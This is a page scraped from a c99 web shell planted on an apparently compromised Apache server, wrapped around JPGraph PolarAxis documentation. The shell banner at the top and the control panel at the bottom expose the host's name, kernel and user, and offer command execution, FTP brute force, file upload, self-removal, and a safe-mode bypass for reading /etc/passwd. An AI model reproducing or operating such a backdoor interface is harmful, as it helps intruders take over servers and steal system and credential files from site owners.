!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PolarAxis.html (19.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS PolarAxis EXTENDS Axis
(Defined in: jpgraph_polar.php : 151)
 PolarAxis  Axis 
 HideTicks() 
 SetAngleFont() 
 SetAngleStep() 
 SetColor() 
 SetGridColor() 
 SetTickColors() 
 ShowAngleDegreeMark() 
 ShowAngleLabel() 
 ShowGrid() 
 Hide() 
 HideFirstLastLabel() 
 HideFirstTickLabel() 
 HideLabels() 
 HideLastTickLabel() 
 HideLine() 
HideTicks() 
 HideZeroLabel() 
SetColor() 
 SetFont() 
 SetLabelAlign() 
 SetLabelAngle() 
 SetLabelFormat() 
 SetLabelFormatCallback() 
 SetLabelFormatString() 
 SetLabelMargin() 
 SetLabelPos() 
 SetLabelSide() 
 SetPos() 
 SetPosAbsDelta() 
 SetTextLabelInterval() 
 SetTextTickInterval() 
 SetTextTicks() 
 SetTickDirection() 
 SetTickLabelMargin() 
 SetTickLabels() 
 SetTickSide() 
 SetTitle() 
 SetTitleMargin() 
 SetTitleSide() 
 SetWeight() 
 

Class usage and Overview
Represents the different axis for a polar plot. This class holds the property both for the radius and the angle axis classes. It is accessed throught the 'axis' property in the PolarGraph class.

 

See also related classes:
PolarGraph

 


Class Methods

 

 

HIde ticks marks

ArgumentDefaultDescription
$aFlg true Hide radius tick marks
$aAngleFlg true Hide angle tick marks

Description
HIde ticks marks 

Example

// Hide just the angle tick marks
$polargraph->axis->HideTicks(false,true);

 

 

Set font for angles

ArgumentDefaultDescription
$aFontFam  Font family
$aFontStyle FS_NORMAL Font style
$aFontSize 10 Font size

Description
Set font for angle labels on the polar graph. 

Example

$polargraph->axis->SetAngleFont(FF_ARIAL,FS_NORMAL,8);

 

 

Set angle step

ArgumentDefaultDescription
$aStep  Step in degrees

Description
Specify the angle step, in degrees, between the angle markers. 

Example

// Set 20 degrees between each marker
$polargraph->axis->SetAngleStep(20);

 

 

Specify axis and label colors

ArgumentDefaultDescription
$aColor  Color for radius axis
$aRadColor '' Color for radius labels
$aAngleColor '' Color for angle labels

Description
Specify axis and label colors. 
 
See also
PolarAxis::SetGridColor

Example

$polargraph->axis->SetColor('black','navy','darkred');

 

 

Set colors for the various grids

ArgumentDefaultDescription
$aMajorColor  Major radius grid color
$aMinorColor '' Minor radius grid color
$aAngleColor '' Angle grid color

Description
Set colors for the various grids 

Example

// Set "Soft" colors for the grid
$polargraph->axis->SetGridColor('lightgray','lightgray','lightgray');

 

 

Specify color for axis tick marks

ArgumentDefaultDescription
$aRadColor  Radius axis colors
$aAngleColor '' Angle axis colors

Description
Specify color for axis tick marks 

Example

$polargraph->axis->SetTickColor('red');

 

 

Add a degree mark after each angel label

ArgumentDefaultDescription
$aFlg true True=Add mark

Description
Add a degree mark after each angel label ( a small sperscripted 'o' ). This is enabled by default. 

Example

$polargraph->axis->ShowAngleDegreeMark(true);

 

 

Show angle labels

ArgumentDefaultDescription
$aFlg true True=show labels

Description
Show angle labels. This is on by default. 

Example

// Enable angle labels
$polargraph->axis->ShowAngleLabel();

 

 

Determine what grid lines should be visible

ArgumentDefaultDescription
$aMajor true Show major radius grid lines
$aMinor false Show minor radius grid lines
$aAngle true Show angle grid lines

Description
Determine what grid lines should be visible. 

Example

// Just display major radius grid line and angles
$polargraph->axis->ShowGrid(true,false,true);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0127 ]--